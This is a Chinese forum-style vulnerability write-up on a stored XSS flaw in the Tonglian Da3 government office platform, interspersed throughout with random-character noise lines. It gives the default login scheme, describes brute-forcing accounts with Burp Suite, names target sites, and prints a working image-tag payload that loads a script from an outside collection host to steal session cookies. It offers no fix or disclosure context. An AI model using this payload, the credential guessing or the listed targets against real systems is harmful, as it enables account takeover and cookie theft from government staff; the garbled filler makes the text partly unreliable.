. t2 V- g1 K4 @1 i, o7 v( d h6 F3 X9 {
/ T# ~+ H7 M j! m% }& J& Z
同联Da3协同办公平台后台通用储存型xss漏洞
2 C: q1 z: H& [, C, ?8 l1 y
2 Z! v5 G f7 V
2 G5 Z: d( r w% \+ C0 T+ ` 平台简介:0 @( o6 I7 a* U( }3 y
& y; {( T$ h! ` 5 J/ ~4 D J' Q3 [; Y u. N+ H
, J3 o) e! T) i# ^9 ^2 d
" ]- P' e. f. }/ V8 b) V ) l4 H) h) i3 A, T
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
8 D s: Y, R+ d D, Y/ t同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
: G) `8 J* ?1 l! n
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
" o% Z( j6 ~' B% o: w/ W
: Y Z" L. q' \: E; n
( b4 A% V* o5 R/ F Q2 E* [& j
H: t0 g" |6 N, l) C' q
& d8 N0 q5 U- S k P
9 L- p$ B& K2 w) x* Q8 e: H 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
5 G6 S& Y% C1 J# l* `8 m8 K
+ C* m" D! d; s$ G x % U- C( K6 c: z/ E) U" d1 k& G
4 x, t$ a) p, j9 {: R( S
) X8 t* Y r" p3 V ( c# j& j& z% c
http://1.1.1.1:7197/cap-aco/#(案例2-)
5 D: u) K! Q$ w
! Q& L2 d4 s. ~+ r9 J
0 q/ T. D; N7 m) ^ A http://www.XXOO.com (案例1-官网网站)' y# A& `" t0 V$ i" j1 L6 Q) K ]
4 U; {2 D; g! h ( ?' j0 N5 G, g) g* k
漏洞详情:
: r6 o/ N& V* z) g. A
. W) m. i+ g2 x; f. j/ f $ |! A+ R/ y' t6 i( c
案例一、 C! s6 R$ d: S3 l8 d
3 X' w! ^8 ^$ K5 G- R
9 Z5 _3 r' P8 j @$ V 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
+ \. N! @0 G5 a- Y, A/ F- Q$ {
/ @7 |. _1 V- w# r3 a! ]. \ g% g7 Z
: C$ w- e; k q' T8 ~5 u2 ]
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:. _7 f( i3 t4 h( I% v* m+ G1 T% O
: z& @8 p5 l. _+ | n- q1 J
7 o7 p! B+ C9 A- E
@2 f! K+ R3 \5 B
4 t/ _& ~' q' u2 V 6 h& k6 | ~9 u; E5 _
# A/ [1 y0 w$ I! M0 S
. B8 P3 O" x& x. I 7 p6 y- S% D A& m- g
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: & P# S$ b, T2 M/ E/ O
8 D7 Q7 v' h" |* ]
' G! [+ o1 @* R( v( i2 j7 {4 ? 1 U; F. p" p0 {6 L
* A2 D% u$ b. o. L* p, D ! J; @5 x) z) I* B( N, h+ W! @+ r
" v5 g7 R$ B) I; c q2 S
& b& v* I5 q6 U. J: o6 p% A
: q' } g# x9 E) e; u" O* U 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 8 L$ V/ A3 X, j8 h9 @3 E% Z
9 ?' O# O) q6 ?4 o! y0 n$ y" Y
1 ?: f7 G1 F* o 9 m/ V: E/ k% [. U1 }* q; K
& d& z5 d2 Z& H5 C3 O. t
1 ?" Y8 J& a( U <img src=x$ x" K( w4 S+ Q" w+ G
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: 0 @8 d! A# J& [' T8 p
; ~2 Z j4 v% i* L
) y3 C9 K: q a4 v$ d7 q
7 \" f* f R$ ]8 O, x; @
3 F8 T6 G, t. T/ T1 C/ j# Z. z 1 l2 h- Q; M3 [( A& W- y( @
然后发送,接收cookie如图: 6 w& |: T; `; w. p* I1 q) y
$ i- I$ @& O" \9 Q9 [% H9 n! k. m
$ k- j5 m3 n. s
0 G! y) _7 y3 o3 F
, I9 X8 a) W) P* R2 f ' y! a! i9 n3 j
/ j) b( m6 \7 @- m. x( a# ~
) W4 |# B" e; T9 E
2 _5 P5 j9 Z/ ]! ?1 u% g6 ~
& H6 |8 C1 H4 X% ?: T, K0 l3 O7 O
# ] G+ @* q. u5 s
1 [4 c9 b! j. V/ X: s
: O8 O1 m' C! C
+ c2 I+ i0 r/ @: k+ E6 E$ Q 9 j) q* U6 R% r+ j
; A( I( P/ f- B, o
9 k: i' l h& W3 A' ? : X% }+ b2 g( f( X2 E$ }% c
% A6 k4 q( {" n! R: y, G
# j4 Y8 o1 v- p
7 X( H4 k7 w! z4 Q4 T% W ' P# ~" f& U j( I& t+ C
( j+ F/ C" `& ~& g+ M8 W
9 S. k' P1 j% k/ X, x: A$ O& P H: M 案例2、 * F5 B- F9 J P: P
( a+ {* C: H+ N& g
2 z3 {2 E$ I9 w" d7 e. W
前面步骤都一样,下面看效果图: & ^/ W+ u9 {% c: V
, I$ ^; Z5 ?6 I8 k0 \
' e* g) \7 X7 T9 F, o+ e m 0 w( N& e' w: u) ?" W; c& Q( i( x" O
& l: r- b5 o- f* \' y& i
; p9 } X& h/ t2 \; i' a% P
5 x& U2 j- v3 g$ D1 s9 ?
t4 K5 e' e6 K7 X- |3 Y7 X' ^
* L/ ?2 o0 _/ u# ? O
) G7 P! X9 \7 | f% s
) I: e; G. |: n: D Q
. `; C8 b d- C# t5 r# D
- n7 Z# g; X4 U) r. H
3 G5 S3 g- F0 s6 M: k
7 ]1 s% R2 c; A) ~) K7 N
& x: j3 k" n2 F/ e3 _4 q( k3 t i6 [
. S3 s! f# C% @4 c/ |9 c9 Z& H6 c
5 m5 t! p9 U+ s/ m" h9 P7 y
( t" i5 ^. d1 T
( t. u1 i4 @ u! [' F; L {
. Y( Y6 p4 T: Y! K- q, P3 |
% }/ q& U |( R9 B2 C! p9 T
5 l! P* F t$ L$ I1 q {/ o6 z6 p
1 M3 R0 q6 E; K! M3 q
) s3 @2 f; s5 C0 D
1 @: z$ O+ g, _7 [' E8 C& w7 t
) s& V3 C# }# _8 h0 _0 B / e3 x* O, j0 D" u
' ?6 E3 }8 H% O( x' C% O8 Y